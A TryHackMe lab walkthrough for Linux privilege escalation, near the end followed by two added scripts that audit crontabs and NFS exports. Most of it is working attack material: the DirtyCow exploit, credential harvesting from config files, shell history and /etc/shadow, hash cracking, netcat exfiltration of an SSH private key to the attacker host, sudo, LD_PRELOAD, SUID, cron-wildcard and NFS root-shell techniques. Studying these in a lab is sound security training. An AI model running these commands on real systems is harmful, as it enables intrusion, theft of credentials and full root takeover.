# Linux PrivEsc Arena

**Room Link:** <https://tryhackme.com/room/linuxprivescarena>

## Privilege Escalation - Kernel Exploits

In the command prompt, type:

**Victim**

```
/home/user/tools/linux-exploit-suggester/linux-exploit-suggester.sh
```

From the output, notice that the OS is vulnerable to “dirtycow”.

<figure><img src="/files/wF2S4aeJ8GRXr6YeDcUj" alt=""><figcaption></figcaption></figure>

### Exploitation

Linux VM

In the command prompt, type:

**Victim**

```
gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w
```

In the command prompt, type:

**Victim**

```
./c0w
```

Note: this step takes 1-2 minutes; allow it some time to work.

In the command prompt, type:

**Victim**

```
passwd
```

In the command prompt, type:

**Victim**

```
id
```

<figure><img src="/files/f1iwYow6X7hw1noXyw1W" alt=""><figcaption></figcaption></figure>

From here, either copy /tmp/passwd back to /usr/bin/passwd or reset your machine to undo the changes made to the passwd binary.

**Victim**

```
ls -lah /usr/bin/passwd 
rm -f /usr/bin/passwd   
cp /tmp/bak /usr/bin/passwd 
ls -lah /usr/bin/passwd 
```

<figure><img src="/files/Bu2q0Jq3cXa2TYTofK5f" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - Stored Passwords (Config Files)

From the output, make note of the value of the “auth-user-pass” directive.

**Victim**

```
cat /home/user/myvpn.ovpn
```

<figure><img src="/files/akg3hSRNPap27KJZI0W5" alt=""><figcaption></figcaption></figure>

From the output, make note of the clear-text credentials.

**Victim**

```
cat /etc/openvpn/auth.txt 
```

<figure><img src="/files/fiFwh6bsU6uMm9di4F7s" alt=""><figcaption></figcaption></figure>

From the output, make note of the clear-text credentials.

**Victim**

```
cat /home/user/.irssi/config | grep -i passw 
```

<figure><img src="/files/sMlAoBs9TIaBP46DVxlf" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - Stored Passwords (History)

**Victim**

```
cat ~/.bash_history | grep -i passw 
```

From the output, make note of the clear-text credentials.

<figure><img src="/files/YaKzFYx445PlsKWCkfXa" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - Weak File Permissions

**Victim**

```
cat /etc/passwd
```

Save the output to a file named `passwd` on your attacker machine.

<figure><img src="/files/xjir3gVwLftBkdyiKGqI" alt=""><figcaption></figcaption></figure>

**Victim**

```
cat /etc/shadow
```

Save the output to a file named `shadow` on your attacker machine.

<figure><img src="/files/BRFeXbaMaAI03KipE1Dw" alt=""><figcaption></figcaption></figure>

**Kali**

```
unshadow passwd shadow > unshadowed.txt
hashcat -m 1800 unshadowed.txt rockyou.txt -O
```

<figure><img src="/files/ir54AMJePObZcTfkP5p9" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - SSH Keys

Found nothing for this box.

**Victim**

```
find / -name authorized_keys 2> /dev/null
```

**Victim**

```
find / -name id_rsa 2> /dev/null
cat /backups/supersecretkeys/id_rsa
```

<figure><img src="/files/AgWGrR6PcTNrvEh8h6m4" alt=""><figcaption></figcaption></figure>

### Netcat

**Kali (receiving)**

```
nc -l -p 1234 > id_rsa
```

**Victim (sending)**

```
nc -w 3 $KALI 1234 < id_rsa
```

**Kali**

```
chmod 400 id_rsa
ssh -i id_rsa root@$VICTIM
```

## Privilege Escalation - Sudo (Shell Escaping)

**Victim**

```
sudo -l
```

<figure><img src="/files/kUsKf16ixMbUK4iYuSG8" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo find /bin -name nano -exec /bin/sh \;
```

<figure><img src="/files/t00iyLv7amMQq5q14otP" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo awk 'BEGIN {system("/bin/sh")}'
```

<figure><img src="/files/u67ocYgKo08MTSs0wKFv" alt=""><figcaption></figcaption></figure>

**Victim**

```
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
```

<figure><img src="/files/Vfs8YjazOuSqmO1OheIl" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo vim -c '!sh'
```

<figure><img src="/files/0Z3pVGfNKQtZ45X8ZEMa" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - Sudo (Abusing Intended Functionality)

**Victim**

```
sudo -l
```

<figure><img src="/files/kUsKf16ixMbUK4iYuSG8" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo apache2 -f /etc/shadow
```

<figure><img src="/files/tiAXx9ud3xnZPi89BSFp" alt=""><figcaption></figcaption></figure>

**Kali**

```
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john hash.txt --show
```

<figure><img src="/files/FltKQhFmd7aIFthFoiG7" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - Sudo (LD_PRELOAD)

**Victim**

```
sudo -l
```

<figure><img src="/files/kUsKf16ixMbUK4iYuSG8" alt=""><figcaption></figcaption></figure>

**exploit.c**

```
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid() and setuid() */

/* With -nostartfiles, this _init runs as soon as the library is preloaded. */
void _init() {
    unsetenv("LD_PRELOAD");   /* avoid re-preloading into the spawned shell */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```

**Victim**

```
gcc -fPIC -shared -o /tmp/exploit.so exploit.c -nostartfiles
sudo LD_PRELOAD=/tmp/exploit.so apache2
```

<figure><img src="/files/TeiHVpz0aMgrurOChQ4O" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - SUID (Shared Object Injection)

**Victim**

```
find / -type f -perm -04000 -ls 2>/dev/null
```

<figure><img src="/files/otjX1hFSAYgjkrdMV72F" alt=""><figcaption></figcaption></figure>

**Victim**

```
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
```

<figure><img src="/files/gM8svfG7Dds0ypOO9Hss" alt=""><figcaption></figcaption></figure>

**Victim**

```
mkdir /home/user/.config
cd /home/user/.config
vi libcalc.c
```

**libcalc.c**

```
#include <stdio.h>
#include <stdlib.h>

/* Constructor: runs automatically when the shared object is loaded. */
static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
```

**Victim**

```
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
/usr/local/bin/suid-so
```

<figure><img src="/files/RfgDmFL8FjBe84JaJqhl" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - SUID (Symlinks)

**Victim #1**

```
dpkg -l | grep nginx
```

<figure><img src="/files/ldd4d7Dxce0lDRf1cn0c" alt=""><figcaption></figcaption></figure>

**Victim #1**

```
su -l www-data
```

**Victim #1**

```
/home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log
```

**Victim #2**

```
invoke-rc.d nginx rotate >/dev/null 2>&1
```

**Victim #1**

```
id
```

<figure><img src="/files/rCEzOtM5nDohEFcD3N9G" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - SUID (Environment Variables #1)

### Detection

**Victim**

```
find / -type f -perm -04000 -ls 2>/dev/null
```

<figure><img src="/files/CJpdH71iWUUX8DCbgusl" alt=""><figcaption></figcaption></figure>

**Victim**

```
strings /usr/local/bin/suid-env
```

<figure><img src="/files/SyjWKgoMTxqgBKf0W6nn" alt=""><figcaption></figcaption></figure>

### Exploitation

**Victim**

```
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
```

**Victim**

```
gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/suid-env
```

**Victim**

```
id
```

<figure><img src="/files/zEQKZORXOxciNrtl26Qc" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - SUID (Environment Variables #2)

### Detection

**Victim**

```
find / -type f -perm -04000 -ls 2>/dev/null
```

<figure><img src="/files/ZHVYeqKt0baI8kK9w0Xq" alt=""><figcaption></figcaption></figure>

**Victim**

```
/usr/local/bin/suid-env2
```

### Exploitation Method #1

**Victim**

```
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
```

**Victim**

```
export -f /usr/sbin/service
```

**Victim**

```
/usr/local/bin/suid-env2
```

### Exploitation Method #2

**Victim**

```
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
```

## Privilege Escalation - Capabilities

**Victim**

```
getcap -r / 2>/dev/null
```

<figure><img src="/files/xjF39enymux9rPCRwSDe" alt=""><figcaption></figcaption></figure>

**Victim**

```
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```

<figure><img src="/files/VNNprmy5fV2qib49uCBe" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - Cron (Path)

### Detection

**Victim**

```
cat /etc/crontab
```

<figure><img src="/files/TUFdcKzt2XkO1qHFZsq3" alt=""><figcaption></figcaption></figure>

### Exploitation

**Victim**

```
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh
```

Wait 1 minute for the Bash script to execute.

**Victim**

```
/tmp/bash -p
id
```

<figure><img src="/files/b7BeVaevrpSs1qdFKOdN" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - Cron (Wildcards)

### Detection

From the output, notice the script “/usr/local/bin/compress.sh”.

**Victim**

```
cat /etc/crontab
```

<figure><img src="/files/shnBtrqldZTCoDgQrgeN" alt=""><figcaption></figcaption></figure>

**Victim**

```
cat /usr/local/bin/compress.sh
```

<figure><img src="/files/pxUj15iQ9MBuaVsC21lh" alt=""><figcaption></figcaption></figure>

### Exploitation

**Victim**

```
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
```

**Victim**

```
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
```

**Victim**

```
/tmp/bash -p
id
```

<figure><img src="/files/007ucYPZRXJJtVm8PJ9D" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - Cron (File Overwrite)

### Detection

From the output, notice the script “overwrite.sh”.

**Victim**

```
cat /etc/crontab
```

<figure><img src="/files/MS3nzL05FWWnmrhlposM" alt=""><figcaption></figcaption></figure>

From the output, notice the file permissions.

**Victim**

```
ls -l /usr/local/bin/overwrite.sh
```

<figure><img src="/files/pOPss1Pf9dmxozFaLC2A" alt=""><figcaption></figcaption></figure>

### Exploitation

**Victim**

```
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
```

Wait 1 minute for the Bash script to execute.

**Victim**

```
/tmp/bash -p
id
```
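The Cron (Path) and Cron (File Overwrite) sections above both come down to one misconfiguration: a root cron job that runs a script a non-root user can replace. The following audit script is an added example, not part of the room, that parses a system crontab and flags both conditions; `unsafe_path` and `audit_crontab` are names chosen here, and the check treats any path not owned by root or world-writable as replaceable.

```shell
#!/bin/sh
# Added defensive check (not part of the room): flag cron jobs that a
# non-root user could hijack, either because the scheduled script itself
# is writable (Cron - File Overwrite) or because the job names its command
# by a relative path and an earlier PATH entry is writable (Cron - Path).

# unsafe_path PATH: true if the file or directory is not owned by root
# or is world-writable, i.e. a non-root user can replace or add to it.
unsafe_path() {
    [ -n "$(find "$1" -prune \( ! -user root -o -perm -002 \) 2>/dev/null)" ]
}

# audit_crontab FILE: parse a system crontab (min hour dom mon dow user
# command) and print one line per finding. Returns 0 if nothing is flagged.
audit_crontab() {
    file=$1
    findings=0
    # cron resolves commands with the PATH set in the crontab itself
    cron_path=$(sed -n 's/^PATH=//p' "$file" | tail -n 1)
    [ -n "$cron_path" ] || cron_path=/usr/bin:/bin
    while IFS= read -r line; do
        # skip blank lines, comments and VAR=value assignments
        case "$line" in ''|'#'*|[A-Za-z_]*) continue ;; esac
        set -f; set -- $line; set +f      # split fields without globbing '*'
        [ $# -ge 7 ] || continue
        user=$6; cmd=$7
        case "$cmd" in
        /*) if [ -e "$cmd" ] && unsafe_path "$cmd"; then
                echo "WRITABLE SCRIPT ($user): $cmd"
                findings=$((findings + 1))
            fi ;;
        *)  # every PATH entry searched before the real location can hold a
            # same-named file, so walk them in order until the command is found
            save_ifs=$IFS; IFS=:
            for dir in $cron_path; do
                IFS=$save_ifs
                if unsafe_path "$dir"; then
                    echo "HIJACKABLE PATH ($user): $cmd resolved via $dir"
                    findings=$((findings + 1))
                fi
                [ -e "$dir/$cmd" ] && break
            done
            IFS=$save_ifs ;;
        esac
    done < "$file"
    echo "$findings finding(s) in $file"
    [ "$findings" -eq 0 ]
}
```

Run it as `audit_crontab /etc/crontab`; the remediation for every finding is the same: root-owned, non-world-writable scripts, referenced by absolute path, with a PATH that contains only root-owned directories.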

## Privilege Escalation - NFS Root Squashing

### Detection

From the output, notice that the `no_root_squash` option is defined for the `/tmp` export.

**Victim**

```
cat /etc/exports
```

<figure><img src="/files/Kfg5zAaLv7wJ8JDYA0an" alt=""><figcaption></figcaption></figure>

### Exploitation

**Kali**

```
showmount -e $VICTIM
```

<figure><img src="/files/aguHygNCapLjOeoEKUBm" alt=""><figcaption></figcaption></figure>

**Kali**

```
mkdir /tmp/1
mount -o rw,vers=2 10.10.26.171:/tmp /tmp/1
```

**Kali**

```
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
```

**Kali**

```
gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/x
```

**Victim**

```
/tmp/x
id
```

<figure><img src="/files/fPF7QEDhGvq2d4GO3VrI" alt=""><figcaption></figcaption></figure>
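The detection step above reads `/etc/exports` by eye. As an added example (not part of the room), the function below parses the `path client(options) client(options)` format and reports every client that is granted `no_root_squash`, which is what allows a root user on the client to leave root-owned SUID files in the export; `audit_exports` is a name chosen here.

```shell
#!/bin/sh
# Added defensive check (not part of the room): list NFS exports that grant
# no_root_squash. The default root_squash maps client root to nobody, so a
# SUID file written over NFS would not end up root-owned on the server.

# audit_exports FILE: parse /etc/exports style lines of the form
#   /path  client1(opt,opt)  client2(opt,opt)
# and print one line per client granted no_root_squash.
# Returns 0 if nothing is flagged, 1 otherwise.
audit_exports() {
    file=$1
    findings=0
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac
        set -f; set -- $line; set +f      # split fields; '*' is a client, not a glob
        export_path=$1; shift
        for entry in "$@"; do
            client=${entry%%\(*}                # text before '('
            opts=${entry#*\(}; opts=${opts%\)}  # text inside '(...)'
            case ",$opts," in
            *,no_root_squash,*)
                echo "UNSAFE: $export_path exported to $client with no_root_squash"
                findings=$((findings + 1)) ;;
            esac
        done
    done < "$file"
    [ "$findings" -eq 0 ]
}
```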
